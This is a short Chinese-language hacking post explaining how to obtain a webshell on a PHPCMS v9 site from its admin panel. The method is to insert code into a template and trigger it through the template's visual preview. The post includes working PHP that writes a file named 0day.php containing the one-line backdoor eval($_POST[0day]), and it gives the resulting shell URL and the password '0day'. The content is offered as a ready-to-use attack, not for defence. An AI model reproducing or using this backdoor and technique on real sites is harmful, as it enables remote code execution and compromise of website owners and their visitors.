Phpcms v9后台拿webshell

phpcms v9现在安全多了，拿shell确实很麻烦，但无意中还是发现了个漏洞，原来phpcms2008拿shell方法还是很多的，但在v9都用不了了，但是不知道为啥phpcmcs v9会出现这么低级的漏洞，实在无语了..

操作方法：
进入后台后点击界面--模版风格--随便找个页面点击修改
插入代码后点击提交..
然后回到模版管理找到刚才修改的页面，点击 可视化..
恩，代码执行了
看到这里估计很多人直接崩溃了....很明显的看到phpcms v9后台很注重安全了，但不知道为什么又出现了这种低级的失误.哎..
上个生成代码：
<?
$fp = @fopen("0day.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[0day])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
一句话地址：http://www.iick.blog/0day.php 密码 0day